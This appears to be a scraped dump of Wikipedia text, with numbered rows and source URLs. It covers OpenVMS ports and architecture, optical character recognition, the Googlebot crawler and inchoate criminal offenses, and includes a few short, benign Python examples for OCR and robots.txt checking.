The Itanium port of OpenVMS supports specific models and configurations of HPE Integrity Servers. 10 The Itanium releases were originally named HP OpenVMS Industry Standard 64 for Integrity Servers, although the names OpenVMS I64 or OpenVMS for Integrity Servers are more commonly used. 68 The Itanium port was accomplished using source code maintained in common within the OpenVMS Alpha source code library, with the addition of conditional code and additional modules where changes specific to Itanium were required. 57 This required certain architectural dependencies of OpenVMS to be replaced, or emulated in software. Some of the changes included using the Extensible Firmware Interface (EFI) to boot the operating system, 69 reimplementing the functionality previously provided by Alpha PALcode inside the kernel, 70 using new executable file formats (Executable and Linkable Format and DWARF), 71 and adopting IEEE 754 as the default floating point format. 72 As with the VAX to Alpha port, a binary translator for Alpha to Itanium was made available, allowing user-mode OpenVMS Alpha software to be ported to Itanium in situations where it was not possible to recompile the source code. This translator is known as the Alpha Environment Software Translator (AEST), and it also supported translating VAX executables which had already been translated with VEST. 73 Two pre-production releases, OpenVMS I64 V8.0 and V8.1, were available on June 30, 2003, and on December 18, 2003. These releases were intended for HP organizations and third-party vendors involved with porting software packages to OpenVMS I64. The first production release, V8.2, was released in February 2005. V8.2 was also released for Alpha; subsequent V8.x releases of OpenVMS have maintained feature parity between the Alpha and Itanium architectures. 74 When VMS Software Inc. (VSI) announced that they had secured the rights to develop the OpenVMS operating system from HP, they also announced their intention to port OpenVMS to the x86 64 architecture. 75 The porting effort ran concurrently with the establishment of the company, as well as the development of VSI's own Itanium and Alpha releases of OpenVMS V8.4 x. The x86 64 port is targeted for specific servers from HPE and Dell, as well as certain virtual machine hypervisors. 76 Initial support was targeted for KVM and VirtualBox. Support for VMware was announced in 2020, and Hyper-V is being explored as a future target. 77 In 2021, the x86 64 port was demonstrated running on an Intel Atom-based single-board computer. 78 As with the Alpha and Itanium ports, the x86 64 port made some changes to simplify porting and supporting OpenVMS on the new platform including: replacing the proprietary GEM compiler backend used by the VMS compilers with LLVM, 79 changing the boot process so that OpenVMS is booted from a memory disk, 80 and simulating the four privilege levels of OpenVMS in software since only two of x86 64's privilege levels are usable by OpenVMS. 70 The first boot was announced on May 14, 2019. This involved booting OpenVMS on VirtualBox, and successfully running the DIRECTORY command. 81 In May 2020, the V9.0 Early Adopter's Kit release was made available to a small number of customers. This consisted of the OpenVMS operating system running in a VirtualBox VM with certain limitations; most significantly, few layered products were available, and code can only be compiled for x86 64 using cross compilers which run on Itanium-based OpenVMS systems. 
21 Following the V9.0 release, VSI released a series of updates on a monthly or bimonthly basis which added additional functionality and hypervisor support. These were designated V9.0 A through V9.0 H. 82 In June 2021, VSI released the V9.1 Field Test, making it available to VSI's customers and partners. 83 V9.1 shipped as an ISO image which can be installed onto a variety of hypervisors, and onto HPE ProLiant DL380 servers starting with the V9.1 A release. 84 During the 1980s, the MICA operating system for the PRISM architecture was intended to be the eventual successor to VMS. MICA was designed to maintain backwards compatibility with VMS applications while also supporting Ultrix applications on top of the same kernel. 85 MICA was ultimately cancelled along with the rest of the PRISM platform, leading Dave Cutler to leave DEC for Microsoft. At Microsoft, Cutler led the creation of the Windows NT operating system, which was heavily inspired by the architecture of MICA. 86 As a result, VMS is considered an ancestor of Windows NT, together with RSX 11, VAXELN and MICA, and many similarities exist between VMS and NT. 87 A now-defunct project named FreeVMS attempted to develop an open-source operating system following VMS conventions. 88 89 FreeVMS was built on top of the L4 microkernel and supported the x86 64 architecture. Prior work investigating the implementation of VMS using a microkernel-based architecture had previously been undertaken as a prototyping exercise by DEC employees with assistance from Carnegie Mellon University using the Mach 3.0 microkernel ported to VAXstation 3100 hardware, adopting a multiserver architectural model. 90 The OpenVMS operating system has a layered architecture, consisting of a privileged Executive, an intermediately privileged Command Language Interpreter, and unprivileged utilities and run-time libraries (RTLs). 91 Unprivileged code typically invokes the functionality of the Executive through system services (equivalent to system calls in other operating systems). OpenVMS' layers and mechanisms are built around certain features of the VAX architecture, including: 91 92 These VAX architecture mechanisms are implemented on Alpha, Itanium and x86 64 by either mapping to corresponding hardware mechanisms on those architectures, or through emulation (via PALcode on Alpha, or in software on Itanium and x86 64). 70 The OpenVMS Executive comprises the privileged code and data structures which reside in the system space. The Executive is further subdivided between the Kernel, which consists of the code which runs at the kernel access mode, and the less-privileged code outside of the Kernel which runs at the executive access mode. 91 The components of the Executive which run at executive access mode include the Record Management Services, and certain system services such as image activation. The main distinction between the kernel and executive access modes is that most of the operating system's core data structures can be read from executive mode, but require kernel mode to be written to. 92 Code running at executive mode can switch to kernel mode at will, meaning that the barrier between the kernel and executive modes is intended as a safeguard against accidental corruption as opposed to a security mechanism. 93 The Kernel comprises the operating system's core data structures (e.g. page tables, the I O database and scheduling data), and the routines which operate on these structures. 
The Kernel is typically described as having three major subsystems: I O, Process and Time Management, Memory Management. 91 92 In addition, other functionality such as logical name management, synchronization and system service dispatch are implemented inside the Kernel. OpenVMS allows user-mode code with suitable privileges to switch to executive or kernel mode using the CMEXEC and CMKRNL system services, respectively. 94 This allows code outside of system space to have direct access to the Executive's routines and system services. In addition to allowing third-party extensions to the operating system, Privileged Images are used by core operating system utilities to manipulate operating system data structures through undocumented interfaces. 95 The typical user and application interface into the file system is the Record Management Services (RMS), although applications can interface directly with the underlying file system through the QIO system services. 96 The file systems supported by VMS are referred to as the Files 11 On-Disk Structures (ODS), the most significant of which are ODS 2 and ODS 5. 97 VMS is also capable of accessing files on ISO 9660 CD-ROMs and magnetic tape with ANSI tape labels. 98 Files 11 is limited to 2 TiB volumes. 97 DEC attempted to replace it with a log-structured file system named Spiralog, first released in 1995. 99 However, Spiralog was discontinued due to a variety of problems, including issues with handling full volumes. 100 Instead, there has been discussion of porting the open-source GFS2 file system to OpenVMS. 101 An OpenVMS Command Language Interpreter (CLI) implements a command-line interface for OpenVMS, responsible for executing individual commands and command procedures (equivalent to shell scripts or batch files). 102 The standard CLI for OpenVMS is the DIGITAL Command Language, although other options are available. Unlike Unix shells, which typically run in their own isolated process and behave like any other user-mode program, OpenVMS CLIs are an optional component of a process, which exist alongside any executable image which that process may run. 103 Whereas a Unix shell will typically run executables by creating a separate process using fork-exec, an OpenVMS CLI will typically load the executable image into the same process, transfer control to the image, and ensure that control is transferred back to CLI once the image has exited and that the process is returned to its original state. 91 Because the CLI is loaded into the same address space as user code, and the CLI is responsible for invoking image activation and image rundown, the CLI is mapped into the process address space at supervisor access mode, a higher level of privilege than most user code. This is in order to prevent accidental or malicious manipulation of the CLI's code and data structures by user-mode code. 91 103 OpenVMS supports clustering (first called VAXcluster and later VMScluster), where multiple computers run their own instance of the operating system. Clustered computers (nodes) may be fully independent from each other, or they may share devices like disk drives and printers. Communication across nodes provides a single system image abstraction. 104 Nodes may be connected to each other via a proprietary hardware connection called Cluster Interconnect or via a standard Ethernet LAN. OpenVMS supports up to 96 nodes in a single cluster. It also allows mixed-architecture clusters. 24 OpenVMS clusters allow applications to function during planned or unplanned outages. 
105 Planned outages include hardware and software upgrades. 106 The DECnet protocol suite is tightly integrated into VMS, allowing remote logins, as well as transparent access to files, printers and other resources on VMS systems over a network. 107 VAX VMS V1.0 featured support for DECnet Phase II, 108 and modern versions of VMS support both the traditional Phase IV DECnet protocol, as well as the OSI-compatible Phase V (also known as DECnet-Plus). 109 Support for TCP IP is provided by the optional TCP IP Services for OpenVMS layered product (originally known as the VMS ULTRIX Connection, then as the ULTRIX Communications Extensions or UCX). 110 111 TCP IP Services is based on a port of the BSD network stack to OpenVMS, 112 along with support for common protocols such as SSH, DHCP, FTP and SMTP. DEC sold a software package named PATHWORKS (originally known as the Personal Computer Systems Architecture or PCSA) which allowed personal computers running MS-DOS, Microsoft Windows or OS 2, or the Apple Macintosh to serve as a terminal for VMS systems, or to use VMS systems as a file or print server. 113 PATHWORKS was later renamed to Advanced Server for OpenVMS, and was eventually replaced with a VMS port of Samba at the time of the Itanium port. 114 DEC provided the Local Area Transport (LAT) protocol which allowed remote terminals and printers to be attached to a VMS system through a terminal server such as one of the DECserver family. 115 DEC (and its successor companies) provided a wide variety of programming languages for VMS. Officially supported languages on VMS, either current or historical, include: 116 117 Among OpenVMS's notable features is the Common Language Environment, a strictly defined standard that specifies calling conventions for functions and routines, including use of stacks, registers, etc., independent of programming language. 118 Because of this, it is possible to call a routine written in one language (for example, Fortran) from another (for example, COBOL), without needing to know the implementation details of the target language. OpenVMS itself is implemented in a variety of different languages and the common language environment and calling standard supports freely mixing these languages. 119 DEC created a tool named the Structure Definition Language (SDL), which allowed data type definitions to be generated for different languages from a common definition. 120 DEC provided a collection of software development tools in a layered product named DECset (originally named VAXset). 116 This consisted of the following tools: 121 The OpenVMS Debugger supports all DEC compilers and many third-party languages. It allows breakpoints, watchpoints and interactive runtime program debugging using either a command line or graphical user interface. 123 A pair of lower-level debuggers, named DELTA and XDELTA, can be used to debug privileged code in additional to normal application code. 124 In 2019, VSI released an officially supported Integrated Development Environment for VMS based on Visual Studio Code. 76 This allows VMS applications to be developed and debugged remotely from a Microsoft Windows, macOS or Linux workstation. 125 DEC created a number of optional database products for VMS, some of which were marketed as the VAX Information Architecture family. 126 These products included: In 1994, DEC sold Rdb, DBMS and CDD to Oracle, where they remain under active development. 
131 In 1995, DEC sold DSM to InterSystems, who renamed it Open M, and eventually replaced it with their Cach product. 132 Examples of third-party database management systems for OpenVMS include MariaDB, 133 Mimer SQL 134 (Itanium and x86 64 135 ), and System 1032. 136 VMS was originally designed to be used and managed interactively using DEC's text-based video terminals such as the VT100, or hardcopy terminals such as the DECwriter series. Since the introduction of the VAXstation line in 1984, VMS has optionally supported graphical user interfaces for use with workstations or X terminals such as the VT1000 series. The DIGITAL Command Language (DCL) has served as the primary command language interpreter (CLI) of OpenVMS since the first release. 137 30 10 Other official CLIs available for VMS include the RSX 11 Monitor Console Routine (MCR) (VAX only), and various Unix shells. 116 DEC provided tools for creating text-based user interface applications the Form Management System (FMS) and Terminal Data Management System (TDMS), later succeeded by DECforms. 138 139 140 A lower level interface named Screen Management Services (SMG ), comparable to Unix curses, also exists. 141 Over the years, VMS has gone through a number of different GUI toolkits and interfaces: Versions of VMS running on DEC Alpha workstations in the 1990s supported OpenGL 152 and Accelerated Graphics Port (AGP) graphics adapters. VMS also provides support for older graphics standards such as GKS and PHIGS. 153 154 Modern versions of DECwindows are based on X.Org Server. 10 OpenVMS provides various security features and mechanisms, including security identifiers, resource identifiers, subsystem identifiers, ACLs, intrusion detection and detailed security auditing and alarms. 155 Specific versions evaluated at Trusted Computer System Evaluation Criteria Class C2 and, with the SEVMS security enhanced release at Class B1. 156 OpenVMS also holds an ITSEC E3 rating (see NCSC and Common Criteria). 157 Passwords are hashed using the Purdy Polynomial. Various official Unix and POSIX compatibility layers were created for VMS. The first of these was DEC Shell, which was a layered product consisting of ports of the Bourne shell from Version 7 Unix and several other Unix utilities to VAX VMS. 116 In 1992, DEC released the POSIX for OpenVMS layered product, which included a shell based on the KornShell. 164 POSIX for OpenVMS was later replaced by the open-source GNV (GNU's not VMS) project, which was first included in OpenVMS media in 2002. 165 Amongst other GNU tools, GNV includes a port of the Bash shell to VMS. 166 Examples of third-party Unix compatibility layers for VMS include Eunice. 167 In 1997, OpenVMS and a number of layered products were made available free of charge for hobbyist, non-commercial use as part of the OpenVMS Hobbyist Program. 168 Since then, several companies producing OpenVMS software have made their products available under the same terms, such as Process Software. 169 Prior to the x86 64 port, the age and cost of hardware capable of running OpenVMS made emulators such as SIMH a common choice for hobbyist installations. 170 In March 2020, HPE announced the end of the OpenVMS Hobbyist Program. 171 This was followed by VSI's announcement of the Community License Program (CLP) in April 2020, which was intended as a replacement for the HPE Hobbyist Program. 172 The CLP was launched in July 2020, and provides licenses for VSI OpenVMS releases on Alpha, Integrity and x86 64 systems. 
173 OpenVMS for VAX is not covered by the CLP, since there are no VSI releases of OpenVMS VAX, and the old versions are still owned by HPE. 174 |
393 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Optical_character_recognition | Optical character recognition or optical character reader (OCR) is the electronic or mechanical conversion of images of typed, handwritten or printed text into machine-encoded text, whether from a scanned document, a photo of a document, a scene photo (for example the text on signs and billboards in a landscape photo) or from subtitle text superimposed on an image (for example: from a television broadcast). 1 Widely used as a form of data entry from printed paper data records whether passport documents, invoices, bank statements, computerized receipts, business cards, mail, printed data, or any suitable documentation it is a common method of digitizing printed texts so that they can be electronically edited, searched, stored more compactly, displayed online, and used in machine processes such as cognitive computing, machine translation, (extracted) text-to-speech, key data and text mining. OCR is a field of research in pattern recognition, artificial intelligence and computer vision. Early versions needed to be trained with images of each character, and worked on one font at a time. Advanced systems capable of producing a high degree of accuracy for most fonts are now common, and with support for a variety of image file format inputs. 2 Some systems are capable of reproducing formatted output that closely approximates the original page including images, columns, and other non-textual components. Early optical character recognition may be traced to technologies involving telegraphy and creating reading devices for the blind. 3 In 1914, Emanuel Goldberg developed a machine that read characters and converted them into standard telegraph code. 4 Concurrently, Edmund Fournier d'Albe developed the Optophone, a handheld scanner that when moved across a printed page, produced tones that corresponded to specific letters or characters. 5 In the late 1920s and into the 1930s, Emanuel Goldberg developed what he called a "Statistical Machine" for searching microfilm archives using an optical code recognition system. In 1931, he was granted US Patent number 1,838,389 for the invention. The patent was acquired by IBM. In 1974, Ray Kurzweil started the company Kurzweil Computer Products, Inc. and continued development of omni-font OCR, which could recognize text printed in virtually any font. (Kurzweil is often credited with inventing omni-font OCR, but it was in use by companies, including CompuScan, in the late 1960s and 1970s. 3 6 ) Kurzweil used the technology to create a reading machine for blind people to have a computer read text to them out loud. The device included a CCD-type flatbed scanner and a text-to-speech synthesizer. On January 13, 1976, the finished product was unveiled during a widely reported news conference headed by Kurzweil and the leaders of the National Federation of the Blind. citation needed In 1978, Kurzweil Computer Products began selling a commercial version of the optical character recognition computer program. LexisNexis was one of the first customers, and bought the program to upload legal paper and news documents onto its nascent online databases. Two years later, Kurzweil sold his company to Xerox, which eventually spun it off as Scansoft, which merged with Nuance Communications. 
In the 2000s, OCR was made available online as a service (WebOCR), in a cloud computing environment, and in mobile applications like real-time translation of foreign-language signs on a smartphone. With the advent of smartphones and smartglasses, OCR can be used in internet connected mobile device applications that extract text captured using the device's camera. These devices that do not have built-in OCR functionality will typically use an OCR API to extract the text from the image file captured by the device. 7 8 The OCR API returns the extracted text, along with information about the location of the detected text in the original image back to the device app for further processing (such as text-to-speech) or display. Various commercial and open source OCR systems are available for most common writing systems, including Latin, Cyrillic, Arabic, Hebrew, Indic, Bengali (Bangla), Devanagari, Tamil, Chinese, Japanese, and Korean characters. OCR engines have been developed into software applications specializing in various subjects such as receipts, invoices, checks, and legal billing documents. The software can be used for: OCR is generally an offline process, which analyses a static document. There are cloud based services which provide an online OCR API service. Handwriting movement analysis can be used as input to handwriting recognition. 14 Instead of merely using the shapes of glyphs and words, this technique is able to capture motion, such as the order in which segments are drawn, the direction, and the pattern of putting the pen down and lifting it. This additional information can make the process more accurate. This technology is also known as "online character recognition", "dynamic character recognition", "real-time character recognition", and "intelligent character recognition". OCR software often pre-processes images to improve the chances of successful recognition. Techniques include: 15 Segmentation of fixed-pitch fonts is accomplished relatively simply by aligning the image to a uniform grid based on where vertical grid lines will least often intersect black areas. For proportional fonts, more sophisticated techniques are needed because whitespace between letters can sometimes be greater than that between words, and vertical lines can intersect more than one character. 22 There are two basic types of core OCR algorithm, which may produce a ranked list of candidate characters. 23 Software such as Cuneiform and Tesseract use a two-pass approach to character recognition. The second pass is known as adaptive recognition and uses the letter shapes recognized with high confidence on the first pass to better recognize the remaining letters on the second pass. This is advantageous for unusual fonts or low-quality scans where the font is distorted (e.g. blurred or faded). 22 As of December 2016 update , modern OCR software includes Google Docs OCR, ABBYY FineReader, and Transym. 26 needs update Others like OCRopus and Tesseract use neural networks which are trained to recognize whole lines of text instead of focusing on single characters. A technique known as iterative OCR automatically crops a document into sections based on the page layout. OCR is then performed on each section individually using variable character confidence level thresholds to maximize page-level OCR accuracy. A patent from the United States Patent Office has been issued for this method. 
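As a hands-on illustration of the Tesseract engine mentioned above, the sketch below runs OCR from Python through the pytesseract wrapper; the wrapper is my assumption rather than something the article prescribes, the image filename is a placeholder, and the confidence threshold of 60 is arbitrary.

# Hedged sketch: basic OCR with Tesseract via the pytesseract wrapper (assumed installed).
# "scanned_page.png" is a placeholder filename.
from PIL import Image
import pytesseract

image = Image.open("scanned_page.png")
text = pytesseract.image_to_string(image, lang="eng")          # recognized text as a string
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)  # per-word details
low_confidence = [word for word, conf in zip(data["text"], data["conf"])
                  if word.strip() and float(conf) < 60]        # words worth manual review
print(text)
print("Low-confidence words:", low_confidence)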
27 The OCR result can be stored in the standardized ALTO format, a dedicated XML schema maintained by the United States Library of Congress. Other common formats include hOCR and PAGE XML. For a list of optical character recognition software, see Comparison of optical character recognition software. OCR accuracy can be increased if the output is constrained by a lexicon a list of words that are allowed to occur in a document. 15 This might be, for example, all the words in the English language, or a more technical lexicon for a specific field. This technique can be problematic if the document contains words not in the lexicon, like proper nouns. Tesseract uses its dictionary to influence the character segmentation step, for improved accuracy. 22 The output stream may be a plain text stream or file of characters, but more sophisticated OCR systems can preserve the original layout of the page and produce, for example, an annotated PDF that includes both the original image of the page and a searchable textual representation. Near-neighbor analysis can make use of co-occurrence frequencies to correct errors, by noting that certain words are often seen together. 28 For example, "Washington, D.C. is generally far more common in English than "Washington DOC". Knowledge of the grammar of the language being scanned can also help determine if a word is likely to be a verb or a noun, for example, allowing greater accuracy. The Levenshtein Distance algorithm has also been used in OCR post-processing to further optimize results from an OCR API. 29 In recent years, when? the major OCR technology providers began to tweak OCR systems to deal more efficiently with specific types of input. Beyond an application-specific lexicon, better performance may be had by taking into account business rules, standard expression, clarification needed or rich information contained in color images. This strategy is called "Application-Oriented OCR" or "Customized OCR", and has been applied to OCR of license plates, invoices, screenshots, ID cards, driver's licenses, and automobile manufacturing. The New York Times has adapted the OCR technology into a proprietary tool they entitle Document Helper, that enables their interactive news team to accelerate the processing of documents that need to be reviewed. They note that it enables them to process what amounts to as many as 5,400 pages per hour in preparation for reporters to review the contents. 30 There are several techniques for solving the problem of character recognition by means other than improved OCR algorithms. Special fonts like OCR-A, OCR-B, or MICR fonts, with precisely specified sizing, spacing, and distinctive character shapes, allow a higher accuracy rate during transcription in bank check processing. Several prominent OCR engines were designed to capture text in popular fonts such as Arial or Times New Roman, and are incapable of capturing text in these fonts that are specialized and very different from popularly used fonts. As Google Tesseract can be trained to recognize new fonts, it can recognize OCR-A, OCR-B and MICR fonts. 31 Comb fields are pre-printed boxes that encourage humans to write more legibly one glyph per box. 28 These are often printed in a dropout color which can be easily removed by the OCR system. 28 Palm OS used a special set of glyphs, known as Graffiti, which are similar to printed English characters but simplified or modified for easier recognition on the platform's computationally limited hardware. 
Users would need to learn how to write these special glyphs. Zone-based OCR restricts the image to a specific part of a document. This is often referred to as Template OCR. Crowdsourcing humans to perform the character recognition can quickly process images like computer-driven OCR, but with higher accuracy for recognizing images than that obtained via computers. Practical systems include the Amazon Mechanical Turk and reCAPTCHA. The National Library of Finland has developed an online interface for users to correct OCRed texts in the standardized ALTO format. 32 Crowd sourcing has also been used not to perform character recognition directly but to invite software developers to develop image processing algorithms, for example, through the use of rank-order tournaments. 33 Commissioned by the U.S. Department of Energy (DOE), the Information Science Research Institute (ISRI) had the mission to foster the improvement of automated technologies for understanding machine printed documents, and it conducted the most authoritative of the Annual Test of OCR Accuracy from 1992 to 1996. 35 Recognition of typewritten, Latin script text is still not 100% accurate even where clear imaging is available. One study based on recognition of 19th- and early 20th-century newspaper pages concluded that character-by-character OCR accuracy for commercial OCR software varied from 81% to 99%; 36 total accuracy can be achieved by human review or Data Dictionary Authentication. Other areas including recognition of hand printing, cursive handwriting, and printed text in other scripts (especially those East Asian language characters which have many strokes for a single character) are still the subject of active research. The MNIST database is commonly used for testing systems' ability to recognize handwritten digits. Accuracy rates can be measured in several ways, and how they are measured can greatly affect the reported accuracy rate. For example, if word context (a lexicon of words) is not used to correct software finding non-existent words, a character error rate of 1% (99% accuracy) may result in an error rate of 5% or worse if the measurement is based on whether each whole word was recognized with no incorrect letters. 37 Using a large enough dataset is important in a neural-network-based handwriting recognition solutions. On the other hand, producing natural datasets is very complicated and time-consuming. 38 An example of the difficulties inherent in digitizing old text is the inability of OCR to differentiate between the "long s" and "f" characters. 39 34 Web-based OCR systems for recognizing hand-printed text on the fly have become well known as commercial products in recent years when? (see Tablet PC history). Accuracy rates of 80% to 90% on neat, clean hand-printed characters can be achieved by pen computing software, but that accuracy rate still translates to dozens of errors per page, making the technology useful only in very limited applications. citation needed Recognition of cursive text is an active area of research, with recognition rates even lower than that of hand-printed text. Higher rates of recognition of general cursive script will likely not be possible without the use of contextual or grammatical information. For example, recognizing entire words from a dictionary is easier than trying to parse individual characters from script. Reading the Amount line of a check (which is always a written-out number) is an example where using a smaller dictionary can increase recognition rates greatly. 
The shapes of individual cursive characters themselves simply do not contain enough information to accurately (greater than 98%) recognize all handwritten cursive script. citation needed Most programs allow users to set "confidence rates". This means that if the software does not achieve their desired level of accuracy, a user can be notified for manual review. An error introduced by OCR scanning is sometimes termed a scanno (by analogy with the term typo). 40 41 Characters to support OCR were added to the Unicode Standard in June 1993, with the release of version 1.1. Some of these characters are mapped from fonts specific to MICR, OCR-A or OCR-B. |
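The lexicon-constrained and Levenshtein-distance post-processing described earlier in this article can be sketched in a few lines of plain Python. The tiny word list and the maximum edit distance of 2 are illustrative assumptions, not values taken from any particular OCR system.

# Hedged sketch: correcting an OCR token against a small lexicon using Levenshtein distance.
def levenshtein(a, b):
    # classic dynamic-programming edit distance between strings a and b
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(previous[j] + 1,                # deletion
                               current[j - 1] + 1,             # insertion
                               previous[j - 1] + (ca != cb)))  # substitution (0 if equal)
        previous = current
    return previous[-1]

def correct_token(token, lexicon, max_distance=2):
    # replace the token with its closest lexicon entry if it is close enough
    best = min(lexicon, key=lambda word: levenshtein(token.lower(), word))
    return best if levenshtein(token.lower(), best) <= max_distance else token

lexicon = ["washington", "character", "recognition"]
print(correct_token("recogn1tion", lexicon))  # -> "recognition"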
394 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Googlebot | Googlebot is the web crawler software used by Google that collects documents from the web to build a searchable index for the Google Search engine. This name is actually used to refer to two different types of web crawlers: a desktop crawler (to simulate desktop users) and a mobile crawler (to simulate a mobile user). 1 A website will probably be crawled by both Googlebot Desktop and Googlebot Mobile. However, starting in September 2020, all sites were switched to mobile-first indexing, meaning Google is crawling the web using a smartphone Googlebot. 2 The subtype of Googlebot can be identified by looking at the user agent string in the request. However, both crawler types obey the same product token (user agent token) in robots.txt, and so a developer cannot selectively target either Googlebot mobile or Googlebot desktop using robots.txt. Google provides various methods that enable website owners to manage the content displayed in Google's search results. If a webmaster chooses to restrict the information on their site available to a Googlebot, or another spider, they can do so with the appropriate directives in a robots.txt file, 3 or by adding the meta tag meta name "Googlebot" content "nofollow" to the web page. 4 Googlebot requests to Web servers are identifiable by a user-agent string containing "Googlebot" and a host address containing "googlebot.com". 5 Currently, Googlebot follows HREF links and SRC links. 3 There is increasing evidence Googlebot can execute JavaScript and parse content generated by Ajax calls as well. 6 There are many theories regarding how advanced Googlebot's ability to process JavaScript is, with opinions ranging upward from minimal ability derived from custom interpreters. 7 Currently, Googlebot uses a web rendering service (WRS) that is based on the Chromium rendering engine (version 74, as of 7 May 2019). 8 Googlebot discovers pages by harvesting every link on every page that it can find. Unless prohibited by a nofollow-tag, it then follows these links to other web pages. New web pages must be linked to from other known pages on the web in order to be crawled and indexed, or manually submitted by the webmaster. A problem that webmasters with low-bandwidth Web hosting plans citation needed have often noted with the Googlebot is that it takes up an enormous amount of bandwidth. citation needed This can cause websites to exceed their bandwidth limit and be taken down temporarily. This is especially troublesome for mirror sites which host many gigabytes of data. Google provides "Search Console", which allows website owners to throttle the crawl rate. 9 How often Googlebot will crawl a site depends on the crawl budget. Crawl budget is an estimation of how frequently a website is updated. citation needed Technically, Googlebot's development team (Crawling and Indexing team) uses several defined terms internally to cover what "crawl budget" stands for. 10 Since May 2019, Googlebot has used the latest Chromium rendering engine, which supports ECMAScript 6 features. This makes the bot a bit more "evergreen" and ensures that it is not relying on an outdated rendering engine compared to browser capabilities. 8 Mediabot is the web crawler that Google uses for analyzing content so that Google AdSense can serve contextually relevant advertising to a web page. Mediabot identifies itself with the user agent string "Mediapartners-Google 2.1". 
Unlike other crawlers, Mediabot does not follow links to discover new crawlable URLs, instead only visiting URLs that have included the AdSense code. 11 Where that content resides behind a login, the crawler can be given a log in so that it is able to crawl protected content. 12 InspectionTool is the crawler used by Search testing tools such as the Rich Result Test and URL inspection in Google Search Console. Apart from the user agent and user agent token, it mimics Googlebot. 13 A guide to the crawlers was independently published. 14 It details four (4) distinctive crawler agents based on Web server directory index data - one (1) non-chrome and three (3) chrome crawlers. |
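Since the article above stresses that Googlebot and its siblings are addressed through product tokens in robots.txt, a small sketch using Python's standard-library robots.txt parser shows how a site's rules can be checked per user agent. The URLs are illustrative examples and the agent names are taken from the article.

# Hedged sketch: checking robots.txt permissions per crawler user agent (standard library only).
from urllib import robotparser

rp = robotparser.RobotFileParser()
rp.set_url("https://en.wikipedia.org/robots.txt")  # illustrative target
rp.read()

for agent in ("Googlebot", "Mediapartners-Google", "*"):
    allowed = rp.can_fetch(agent, "https://en.wikipedia.org/wiki/Web_scraping")
    print(agent, "->", "allowed" if allowed else "disallowed")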
395 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Inchoate_offense | An inchoate offense, preliminary crime, inchoate crime or incomplete crime is a crime of preparing for or seeking to commit another crime. The most common example of an inchoate offense is "attempt". "Inchoate offense" has been defined as the following: "Conduct deemed criminal without actual harm being done, provided that the harm that would have occurred is one the law tries to prevent. 1 2 Every inchoate crime or offense must have the mens rea of intent or of recklessness, typically intent. Absent a specific law, an inchoate offense requires that the defendant have the specific intent to commit the underlying crime. For example, for a defendant to be guilty of the inchoate crime of solicitation of murder, he or she must have intended for a person to die. citation needed Attempt, 3 conspiracy, 4 and solicitation 5 all require mens rea. 6 On the other hand, committing an offense under the US Racketeer Influenced and Corrupt Organizations Act merely requires "knowing", 7 that is, recklessness. Facilitation also requires "believing", 8 yet another way of saying reckless. citation needed Intent may be distinguished from recklessness and criminal negligence as a higher mens rea. 9 Specific intent may be inferred from circumstances. 10 It may be proven by the doctrine of "dangerous proximity", while the Model Penal Code requires a "substantial step in a course of conduct". 11 The doctrine of merger has been abandoned in many jurisdictions in cases involving a conspiracy, allowing an accused to be convicted of both conspiracy and the principal offense. However, an accused cannot be convicted of either attempt or solicitation and the principal offense. 12 A number of defences are possible to the charge of an inchoate offense, depending on the jurisdiction and the nature of the offense. 13 Impossibility is no defence to the crime of attempt where the conditions creating the impossibility are unknown to the actor. 14 Originally at common law, impossibility was a complete defence; 15 as it was under French law at one point. 16 Indeed, the ruling in Collins's Case L. and C. 471 was that an offender cannot be guilty of an attempt to steal his own umbrella when he mistakenly believes that it belongs to another. Although the "moral guilt" for the attempt and the actual crime were the same, there was a distinction between the harm caused by a theft and the harmlessness of an impossible act. 17 This principle was directly overruled in England with the rulings R v Ring and R v. Brown 18 The example from R v Brown of an attempt to steal from an empty pocket is now a classic example of illustrating the point that impossibility is no defense to the crime of attempt when the conditions creating the impossibility are unknown to the actor. This principle has been codified in the Model Penal Code: A person is guilty of an attempt to commit a crime if, acting with the kind of culpability otherwise required for commission of the crime he: purposely engages in conduct which would constitute the crime if the attendant circumstances were as he believes them to be. MPC 5.01 (1)(a) (emphasis added). Consequently, the principle is universal in the United States either in Model Penal Code jurisdictions (40 states) or those remaining common law jurisdictions influenced by the reasoning in R v Brown. 19 Other cases that illustrate the case law for impossibility defences are People v. Lee Kong (CA, 1892), State v. 
Mitchell (MO, 1902), and United States v. Thomas (1962). A defendant may plead and prove, as an affirmative defense, that they: There is some scholarly treatment of burglaries in American law as inchoate crimes, but this is in dispute. According to scholar Frank Schmalleger, burglaries "are actually inchoate crimes in disguise. 20 Other scholars warn about the consequences of such a theory: Burglary, as a preliminary step to another crime, can be seen as an inchoate, or incomplete, offense. As it disrupts the security of persons in their homes and in regard to their personal property, however, it is complete as soon as the intrusion is made. This dual nature is at the heart of a debate about whether the crime of burglary ought to be abolished, leaving its elements to be covered by attempt or as aggravating circumstances to other crimes, or retained and the grading schemes reformed to reflect the seriousness of the individual offense. Certainly, possession of burglary tools, in those jurisdictions that criminalize that activity, creates an inchoate crime (going equipped in the UK). 22 It is clear that: In effect piling an inchoate crime onto an inchoate crime, the possession of burglary tools with the intent to use them in a burglary is a serious offense, a felony in some jurisdictions. Gloves that a defendant was trying to shake off as he ran from the site of a burglary were identified as burglar's tools in Green v. State (Fla. App. 1991). Examples of inchoate offenses include conspiracy, solicitation, facilitation, misprision of felony (and misprision generally), organized crime, Racketeer Influenced and Corrupt Organizations Act (RICO), and attempt, as well as some public health crimes; see the list below. 2 |
